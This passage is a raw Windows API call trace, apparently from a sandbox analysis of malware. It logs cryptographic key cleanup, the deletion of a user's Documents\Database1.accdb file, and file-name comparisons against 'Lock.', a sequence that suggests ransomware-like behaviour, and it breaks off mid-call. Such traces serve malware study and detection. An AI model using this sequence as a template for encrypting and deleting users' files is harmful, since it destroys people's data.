CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0215.620] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.620] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.620] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.620] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.620] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.620] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.620] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab770, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0215.620] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0215.620] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.620] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.620] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.620] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.620] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.621] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.621] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.621] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.621] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.621] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.621] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.621] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.621] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.621] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.621] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.621] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.621] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.621] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.621] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0215.621] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.621] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.621] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.621] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.621] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.621] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.621] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.621] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.621] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.622] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.622] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.622] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.622] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.622] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.622] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.622] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.622] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.622] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.622] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.622] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.622] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.622] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.622] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.622] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.622] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.622] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.622] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.622] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.622] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.622] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.623] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.623] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.623] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0215.623] CryptReleaseContext (hProv=0xa7c660, dwFlags=0x0) returned 1 [0215.623] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.623] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.623] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.623] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.623] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.623] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0215.623] FreeLibrary (hLibModule=0x76390000) returned 1 [0215.623] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.623] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.623] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.623] CloseHandle (hObject=0x510) returned 1 [0215.623] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.623] CloseHandle (hObject=0x504) returned 1 [0215.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.633] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.633] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.633] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.634] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Database1.accdb", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFilePart=0x8cedf4*="Database1.accdb") returned 0x29 [0215.634] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 0x20 [0215.634] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0x9e2138 [0215.634] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 1 [0215.638] FindNextFileW (in: hFindFile=0x9e2138, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3340555c, ftCreationTime.dwHighDateTime=0x1d327b6, ftLastAccessTime.dwLowDateTime=0x3396299d, ftLastAccessTime.dwHighDateTime=0x1d327b6, ftLastWriteTime.dwLowDateTime=0x9daec75b, ftLastWriteTime.dwHighDateTime=0x1d3aafb, nFileSizeHigh=0x0, nFileSizeLow=0x55000, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="Database1.accdb", cAlternateFileName="DATABA~1.ACC")) returned 0 [0215.638] FindClose (in: hFindFile=0x9e2138 | out: hFindFile=0x9e2138) returned 1 [0215.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854470 | out: hHeap=0x2af0000) returned 1 [0215.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.639] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0215.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72328 [0215.640] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaf78 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0215.640] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0215.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x3854bf0 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0215.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0215.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x54) returned 0x2a5f7e0 [0215.642] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/Database1.accdb", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\Database1.accdb", lpFilePart=0x8cf650*="Database1.accdb") returned 0x29 [0215.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f7e0 | out: hHeap=0x2af0000) returned 1 [0215.642] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb")) returned 0xffffffff [0215.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3854bf0 | out: hHeap=0x2af0000) returned 1 [0215.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0215.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0215.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0215.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0215.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.642] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0215.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0215.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0215.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0215.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0215.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0215.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0215.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0215.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0215.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0215.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0215.643] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0215.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="desktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop.ini", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 